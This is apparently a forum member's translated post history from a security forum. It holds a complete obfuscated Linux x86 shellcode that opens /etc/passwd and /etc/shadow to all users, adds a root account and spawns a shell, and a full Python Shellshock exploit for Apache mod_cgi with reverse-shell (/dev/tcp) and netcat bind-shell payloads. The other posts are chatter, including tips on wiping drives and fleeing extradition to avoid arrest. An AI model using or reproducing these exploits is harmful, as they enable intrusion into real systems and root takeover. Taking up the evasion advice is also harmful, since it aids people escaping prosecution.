Everything posted by Kalashnikov.

  1. of course #Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh #length: 521 bytes #Date: 8 September 2018 #Author: Ali Razmjoo #tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
  2. /* #Title: Obfuscated Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh #length: 521 bytes #Date: 8 September 2018 #Author: Ali Razmjoo #tested On: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ] Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com Thanks to Jonathan Salwan chmod('/etc/passwd',777) chmod('/etc/shadow',777) open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd setreuid() , execve('/bin/sh') root@user:~/Desktop/xpl# objdump -d f.o f.o: file format elf32-i386 Disassembly of section .text: 00000000 <_start>: 0: 31 c0 xor %eax,%eax 2: 31 db xor %ebx,%ebx 4: 31 c9 xor %ecx,%ecx 6: 31 d2 xor %edx,%edx 8: bb 59 45 4f 53 mov $0x534f4559,%ebx d: ba 33 36 38 37 mov $0x37383633,%edx 12: 31 d3 xor %edx,%ebx 14: 53 push %ebx 15: c1 eb 08 shr $0x8,%ebx 18: 53 push %ebx 19: bb 7a 46 59 45 mov $0x4559467a,%ebx 1e: ba 55 36 38 36 mov $0x36383655,%edx 23: 31 d3 xor %edx,%ebx 25: 53 push %ebx 26: bb 67 58 45 4e mov $0x4e455867,%ebx 2b: ba 48 3d 31 2d mov $0x2d313d48,%edx 30: 31 d3 xor %edx,%ebx 32: 53 push %ebx 33: 89 e3 mov %esp,%ebx 35: 68 41 41 ff 01 push $0x1ff4141 3a: 59 pop %ecx 3b: c1 e9 08 shr $0x8,%ecx 3e: c1 e9 08 shr $0x8,%ecx 41: 6a 0f push $0xf 43: 58 pop %eax 44: cd 80 int $0x80 46: bb 53 49 57 4a mov $0x4a574953,%ebx 4b: ba 39 2d 38 3d mov $0x3d382d39,%edx 50: 31 d3 xor %edx,%ebx 52: c1 eb 08 shr $0x8,%ebx 55: 53 push %ebx 56: bb 6d 47 45 58 mov $0x5845476d,%ebx 5b: ba 42 34 2d 39 mov $0x392d3442,%edx 60: 31 d3 xor %edx,%ebx 62: 53 push %ebx 63: bb 6e 54 49 57 mov $0x5749546e,%ebx 68: ba 41 31 3d 34 mov $0x343d3141,%edx 6d: 31 d3 xor %edx,%ebx 6f: 53 push %ebx 70: 89 e3 mov %esp,%ebx 72: 68 41 41 ff 01 push $0x1ff4141 77: 59 pop %ecx 78: c1 e9 08 shr $0x8,%ecx 7b: c1 e9 08 shr $0x8,%ecx 7e: 6a 0f push $0xf 80: 58 pop %eax 81: cd 80 int $0x80 83: bb 73 47 4e 51 mov $0x514e4773,%ebx 88: ba 32 
34 39 35 mov $0x35393432,%edx 8d: 31 d3 xor %edx,%ebx 8f: c1 eb 08 shr $0x8,%ebx 92: 53 push %ebx 93: bb 59 44 56 44 mov $0x44564459,%ebx 98: ba 76 34 37 37 mov $0x37373476,%edx 9d: 31 d3 xor %edx,%ebx 9f: 53 push %ebx a0: bb 4e 58 59 51 mov $0x5159584e,%ebx a5: ba 61 3d 2d 32 mov $0x322d3d61,%edx aa: 31 d3 xor %edx,%ebx ac: 53 push %ebx ad: 89 e3 mov %esp,%ebx af: 68 41 41 01 04 push $0x4014141 b4: 59 pop %ecx b5: c1 e9 08 shr $0x8,%ecx b8: c1 e9 08 shr $0x8,%ecx bb: 6a 05 push $0x5 bd: 58 pop %eax be: cd 80 int $0x80 c0: 89 c3 mov %eax,%ebx c2: 6a 04 push $0x4 c4: 58 pop %eax c5: 68 41 73 68 0a push $0xa687341 ca: 59 pop %ecx cb: c1 e9 08 shr $0x8,%ecx ce: 51 push %ecx cf: b9 57 67 57 58 mov $0x58576757,%ecx d4: ba 39 48 35 39 mov $0x39354839,%edx d9: 31 d1 xor %edx,%ecx db: 51 push %ecx dc: b9 4e 64 5a 51 mov $0x515a644e,%ecx e1: ba 74 4b 38 38 mov $0x38384b74,%edx e6: 31 d1 xor %edx,%ecx e8: 51 push %ecx e9: b9 47 57 56 42 mov $0x42565747,%ecx ee: ba 35 38 39 36 mov $0x36393835,%edx f3: 31 d1 xor %edx,%ecx f5: 51 push %ecx f6: b9 61 70 51 4e mov $0x4e517061,%ecx fb: ba 2d 39 6b 61 mov $0x616b392d,%edx 100: 31 d1 xor %edx,%ecx 102: 51 push %ecx 103: b9 48 58 70 74 mov $0x74705848,%ecx 108: ba 72 68 4a 35 mov $0x354a6872,%edx 10d: 31 d1 xor %edx,%ecx 10f: 51 push %ecx 110: b9 76 45 56 46 mov $0x46564576,%ecx 115: ba 3d 6b 6c 76 mov $0x766c6b3d,%edx 11a: 31 d1 xor %edx,%ecx 11c: 51 push %ecx 11d: 68 66 77 55 57 push $0x57557766 122: 68 68 70 31 50 push $0x50317068 127: 68 7a 59 65 41 push $0x4165597a 12c: 68 41 61 41 51 push $0x51416141 131: 68 49 38 75 74 push $0x74753849 136: 68 50 4d 59 68 push $0x68594d50 13b: 68 54 42 74 7a push $0x7a744254 140: 68 51 2f 38 54 push $0x54382f51 145: 68 45 36 6d 67 push $0x676d3645 14a: 68 76 50 2e 73 push $0x732e5076 14f: 68 4e 58 52 37 push $0x3752584e 154: 68 39 4b 55 48 push $0x48554b39 159: 68 72 2f 59 42 push $0x42592f72 15e: 68 56 78 4b 47 push $0x474b7856 163: 68 39 55 66 5a push $0x5a665539 168: 68 46 56 6a 68 push 
$0x686a5646 16d: 68 46 63 38 79 push $0x79386346 172: 68 70 59 6a 71 push $0x716a5970 177: 68 77 69 53 68 push $0x68536977 17c: 68 6e 54 67 54 push $0x5467546e 181: 68 58 4d 69 37 push $0x37694d58 186: 68 2f 41 6e 24 push $0x246e412f 18b: 68 70 55 6e 4d push $0x4d6e5570 190: 68 24 36 24 6a push $0x6a243624 195: b9 73 61 74 67 mov $0x67746173,%ecx 19a: ba 32 2d 3d 5d mov $0x5d3d2d32,%edx 19f: 31 d1 xor %edx,%ecx 1a1: 51 push %ecx 1a2: 89 e1 mov %esp,%ecx 1a4: ba 41 41 41 7f mov $0x7f414141,%edx 1a9: c1 ea 08 shr $0x8,%edx 1ac: c1 ea 08 shr $0x8,%edx 1af: c1 ea 08 shr $0x8,%edx 1b2: cd 80 int $0x80 1b4: 31 c0 xor %eax,%eax 1b6: b0 46 mov $0x46,%al 1b8: 31 db xor %ebx,%ebx 1ba: 31 c9 xor %ecx,%ecx 1bc: cd 80 int $0x80 1be: 31 c0 xor %eax,%eax 1c0: b0 46 mov $0x46,%al 1c2: 31 db xor %ebx,%ebx 1c4: 31 c9 xor %ecx,%ecx 1c6: cd 80 int $0x80 1c8: 68 52 55 48 42 push $0x42485552 1cd: 68 52 51 49 43 push $0x43495152 1d2: b9 49 4b 59 77 mov $0x77594b49,%ecx 1d7: ba 66 38 31 35 mov $0x35313866,%edx 1dc: 31 d1 xor %edx,%ecx 1de: 51 push %ecx 1df: b9 55 55 54 57 mov $0x57545555,%ecx 1e4: ba 7a 37 3d 39 mov $0x393d377a,%edx 1e9: 31 d1 xor %edx,%ecx 1eb: 51 push %ecx 1ec: 89 e3 mov %esp,%ebx 1ee: 31 c0 xor %eax,%eax 1f0: 88 43 07 mov %al,0x7(%ebx) 1f3: 89 5b 08 mov %ebx,0x8(%ebx) 1f6: 89 43 0c mov %eax,0xc(%ebx) 1f9: b0 0b mov $0xb,%al 1fb: 8d 4b 08 lea 0x8(%ebx),%ecx 1fe: 8d 53 0c lea 0xc(%ebx),%edx 201: cd 80 int $0x80 203: b0 01 mov $0x1,%al 205: b3 01 mov $0x1,%bl 207: cd 80 int $0x80 root@user:~/Desktop/xpl# */ #include <stdio.h> #include <string.h> char sc[] = 
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xbb\x59\x45\x4f\x53\xba\x33\x36\x38\x37\x31\xd3\x53\xc1\xeb\x08\x53\xbb\x7a\x46\x59\x45\xba\x55\x36\x38\x36\x31\xd3\x53\xbb\x67\x58\x45\x4e\xba\x48\x3d\x31\x2d\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x53\x49\x57\x4a\xba\x39\x2d\x38\x3d\x31\xd3\xc1\xeb\x08\x53\xbb\x6d\x47\x45\x58\xba\x42\x34\x2d\x39\x31\xd3\x53\xbb\x6e\x54\x49\x57\xba\x41\x31\x3d\x34\x31\xd3\x53\x89\xe3\x68\x41\x41\xff\x01\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x0f\x58\xcd\x80\xbb\x73\x47\x4e\x51\xba\x32\x34\x39\x35\x31\xd3\xc1\xeb\x08\x53\xbb\x59\x44\x56\x44\xba\x76\x34\x37\x37\x31\xd3\x53\xbb\x4e\x58\x59\x51\xba\x61\x3d\x2d\x32\x31\xd3\x53\x89\xe3\x68\x41\x41\x01\x04\x59\xc1\xe9\x08\xc1\xe9\x08\x6a\x05\x58\xcd\x80\x89\xc3\x6a\x04\x58\x68\x41\x73\x68\x0a\x59\xc1\xe9\x08\x51\xb9\x57\x67\x57\x58\xba\x39\x48\x35\x39\x31\xd1\x51\xb9\x4e\x64\x5a\x51\xba\x74\x4b\x38\x38\x31\xd1\x51\xb9\x47\x57\x56\x42\xba\x35\x38\x39\x36\x31\xd1\x51\xb9\x61\x70\x51\x4e\xba\x2d\x39\x6b\x61\x31\xd1\x51\xb9\x48\x58\x70\x74\xba\x72\x68\x4a\x35\x31\xd1\x51\xb9\x76\x45\x56\x46\xba\x3d\x6b\x6c\x76\x31\xd1\x51\x68\x66\x77\x55\x57\x68\x68\x70\x31\x50\x68\x7a\x59\x65\x41\x68\x41\x61\x41\x51\x68\x49\x38\x75\x74\x68\x50\x4d\x59\x68\x68\x54\x42\x74\x7a\x68\x51\x2f\x38\x54\x68\x45\x36\x6d\x67\x68\x76\x50\x2e\x73\x68\x4e\x58\x52\x37\x68\x39\x4b\x55\x48\x68\x72\x2f\x59\x42\x68\x56\x78\x4b\x47\x68\x39\x55\x66\x5a\x68\x46\x56\x6a\x68\x68\x46\x63\x38\x79\x68\x70\x59\x6a\x71\x68\x77\x69\x53\x68\x68\x6e\x54\x67\x54\x68\x58\x4d\x69\x37\x68\x2f\x41\x6e\x24\x68\x70\x55\x6e\x4d\x68\x24\x36\x24\x6a\xb9\x73\x61\x74\x67\xba\x32\x2d\x3d\x5d\x31\xd1\x51\x89\xe1\xba\x41\x41\x41\x7f\xc1\xea\x08\xc1\xea\x08\xc1\xea\x08\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\x68\x52\x55\x48\x42\x68\x52\x51\x49\x43\xb9\x49\x4b\x59\x77\xba\x66\x38\x31\x35\x31\xd1\x51\xb9\x55\x55\x54\x57\xba\x7a\x37\x3d\x39\x31\xd1\x51\x89\xe3\x31\xc0\x88\x43\x07\x8
9\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xb0\x01\xb3\x01\xcd\x80"; int main(void) { fprintf(stdout,"Length: %d\n\n",strlen(sc)); (*(void(*)()) sc)(); }
  3. #! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: ./exploit.py var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages (separated by comma) proxy: host:port proxy Payloads: "reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) "bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) Example: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 Credits: Federico Galatolo 2014 """ sys.exit(0) def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1) args = {} for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1] try: args['payload'] except: usage() if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage() elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage() else: print "[*] Unsupported payload" usage() try: pages = args['pages'].split(",") except: pages = 
["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] try: proxyhost,proxyport = args['proxy'].split(":") except: pass if args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) buff = 1024 while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass
  4. https://forum.avast.com/index.php?topic=156118.0 )
  5. useless. I also found some roots out there, try it yourselves, they're easy to find.
  6. I wouldn't pay more than 200 lei for something like this; it depends on how you sell it and to whom. If you're lucky and sell it to gypsies, you get 500 lei, or a beating and you're left without the computer too (joking). off: https://www.youtube.com/watch?v=5MGprml6bng
  7. Because some people forgot to go to the cinema anymore so that the producer can also make money off the film. Later edit: 31-03-2014, 05:29 PM I know that too; for films it has mostly been people suing one another, but in general the same thing applies to games.
  8. Yes, you read that right. It seems the new version of the American operating system has a keylogger built into its code that records everything users do. For those who don't know, a keylogger is a program that tracks the activity a user performs on their PC. All week we have been discussing here at ArenaIT the new operating system release from Microsoft, Windows 10. We saw the main problems/bugs/impressions formed after two days of using this OS. But today I received news which, at least for me, made me doubt the security of my data. How many of us read the Terms of Service or Privacy Policy before downloading the Windows 10 preview? Probably none of us, because most users (I tend to think over 95% of them) ticked the box expressing their agreement and moved on to the next step. Who knows what rights they granted Microsoft by ticking that box? Well, probably nobody. What does this excerpt say? That you accept that, through Windows 10, you give Microsoft permission to access your files and to record (ATTENTION): the keys you press. That means if you open a file and write in it, Microsoft will have access to what you write, but also to the data about the document. But that's not all. Microsoft has also reserved the right to access your microphone, your email addresses, your call and SMS history, and so on… source: Windows 10 Tehnical Preview are un keylogger incorporat | Arena IT
  9. After teaching him something for free, you'd also give him a prize?
  10. YXN0YSBlIHBhcm9sYTogWkdWbVlXTmw= -> asta e parola: ZGVmYWNl -> deface, it couldn't be simpler than that
  11. Send me the link to the torrent file by PM.
  12. "Given that Interpol is already on my trail, there are probably people spying on you, they've already planted cameras, they're tapping your phone. That's probably your fate if you get into stealing other people's money. on: let's say they probably don't have the above; you go to a friend with the HDD, wipe everything, install Windows, encrypt all the data on the HDD again, reformat and install CS. Anyway there's nothing you can do, they surely have evidence if they have a warrant / come to get you. Probably the easiest method is to flee to a country that has no extradition treaties" sorry for speaking in the first person, I put myself in the character's shoes.
  13. for a million? see you at defcamp
  14. thanks, I got 5 sticks; initially I wanted to get 20, but I said I'd leave some for you too, so as not to be so greedy
  15. Are there shipping fees, or anything extra on top of what's listed there?
  16. Look at the bad side: if I live in the countryside, I don't sit in front of the TV all day to find out that I have to go into town to get that crap done, and if a neighbour is seriously ill, what the hell do I do if I can't call an ambulance? For the prank calls made to the 112 service, the SIM cards should be cancelled / other solutions can be found. // I hope that in 2016 I'll be far away from Romania
  17. Visitors don't like it either, or at least I don't like it.
  18. The site is nice, but I recommend you stop copy-pasting the store/hotel descriptions.
  19. Jesus, the host, does it by any chance say Web hosting, domain names, VPS - 000webhost.com?
  20. What do you expect when Internet Explorer is used? Congratulations on the project, but is it just me who finds that login suspicious? @321 calm down, I was being ironic + 321, can you PM me the source and add something extra to the program
  21. With $1,000 you set up an xxx movie site (share, not upload), $15 for a .com domain, $100 webhosting, you pay people to work (post videos), if you know how you maintain the site yourself, + design, you also pay some people for SEO, and that's it; you make money from plugrush or by selling ads.